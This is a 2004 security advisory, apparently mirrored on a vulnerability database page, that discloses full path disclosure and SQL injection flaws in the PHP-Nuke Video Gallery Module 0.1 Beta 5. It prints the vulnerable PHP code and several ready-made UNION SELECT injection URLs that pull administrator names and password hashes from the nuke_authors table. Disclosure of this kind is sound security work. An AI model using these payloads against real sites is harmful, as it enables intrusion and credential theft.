Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

phpnukeVideo.txt

🗓️ 28 Apr 2004 00:00:00Reported by DarkBichoType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Multiple vulnerabilities found in PHP-Nuke Video Gallery Module version 0.1 Beta 5, dated April 26, 2004.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Adivore: http://bichosoft.webcindario.com/advisory-03.txt  
  
===========================================================================  
=================== Multiple vulnerabilities PHP-Nuke =====================  
=================== Video Gallery Module for PHP-Nuke =====================  
  
PROGRAM: PHP-Nuke Video Gallery Module for PHP-Nuke  
HOMEPAGE: http://videogallery.engorile.com/  
VERSION: 0.1 Beta 5  
BUG: Multiple vulnerabilities  
DATE: 26/04/2004  
AUTHOR: DarkBicho  
web: http://www.darkbicho.tk  
team: Security Wari Proyects <www.swp-zone.org>  
Email: [email protected]  
  
===========================================================================  
===========================================================================  
  
  
Vulnerabilities:  
---------------  
  
1.- CODE:  
¨¨¨¨  
================================ CODE ===================================  
function render_detail_clip($clipid, $catid){  
global $prefix, $dbi, $module_name;  
$tipomime="application/unknown";  
$next=next_clips($clipid, $catid);  
$result=sql_query("select descripcion, url_thumb, url_preview, accesos from   
".$prefix."_videos_clips where clipid=$clipid", $dbi);  
list($descripcion, $url_thumb, $url_preview,   
$accesos)=sql_fetch_row($result, $dbi);  
$resultado=AbreTabla();  
if ($next["previous"]){  
$resultado.="<a   
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["previous"]."&catid=$catid>"._PREVIOUS."</a>";  
}  
$resultado.="</td><td align=right>";  
if ($next["next"]){  
$resultado.="<a   
href=modules.php?name=$module_name&l_op=viewclip&clipid=".$next["next"]."&catid=$catid>"._NEXT."</a>";  
}  
$resultado.=CierraTabla().AbreTabla().$descripcion."</td></tr><tr><td>";  
if ($url_preview != ""){  
$tipomime=tipomime($clipid, "clips");  
$result2=sql_query("select class_id, options_object, options_embed from   
".$prefix."_videos_tipos where tipomime='$tipomime'", $dbi);  
list($class_id, $options_object, $options_embed)=sql_fetch_row($result2,   
$dbi);  
$resultado.="<center>".mete_video($url_preview, $tipomime, 160,   
120)."</center>";  
  
}  
else{  
$resultado.="<center><img src=\"$url_thumb\"></center>";  
}  
$resultado.=CierraTabla().AbreTabla().votacion_clip($clipid, $catid);  
if (count_total($clipid, "clip", "ficheros") > 0){  
$resultado.=CierraTabla().AbreTabla().clip_files($clipid,   
$catid).CierraTabla();  
}  
else{  
$resultado.=CierraTabla();  
}  
$accesos++;  
sql_query("update ".$prefix."_videos_clips set accesos=$accesos where   
clipid=$clipid", $dbi);  
return "$resultado";  
}  
  
=========================================================================  
  
2.- Full path disclosure:  
¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨¨  
  
This vulnerability would allow a remote user to determine the full  
path to the web root directory and other potentially sensitive   
information.  
  
A)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=darkbicho  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL   
result resource in   
/home/hosting/php-nuke/includes/sql_layer.php on line 286  
  
B)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=darkbicho&catid=1  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL   
result resource in   
/home/hosting/php-nuke/includes/sql_layer.php on line 286  
  
  
  
3.- Sql injection:  
¨¨¨¨¨¨¨¨¨¨¨¨¨¨  
This sql injection exploit can pull out from database any information,   
for example  
superadmin's username and password's md5 hash:  
  
  
A)   
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1  
  
B)  
http://[target]/modules.php?name=Video_Gallery&l_op=viewcat&catid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors  
  
c)  
http://[target]/modules.php?name=Video_Gallery&l_op=viewclip&clipid=-1%20UNION%20SELECT%20name%20FROM%20nuke_authors&catid=1  
  
D)  
http://[target]/modules.php?name=Video_Gallery&l_op=voteclip&clipid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors&catid=1  
  
  
SOLUTION:  
¨¨¨¨¨¨¨¨  
Vendors were contacted many weeks ago and plan to release a fixed   
version soon.  
Check the Video Gallery website for updates and official release   
details.  
  
_________________________________________________________________  
Charla con tus amigos en línea mediante MSN Messenger:   
http://messenger.latam.msn.com/  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Apr 2004 00:00Current
7.4High risk
Vulners AI Score7.4
php-nuke vulnerabilitiesvideo gallery moduledarkbicho security wari proyectsapril 2004
18
.json
Report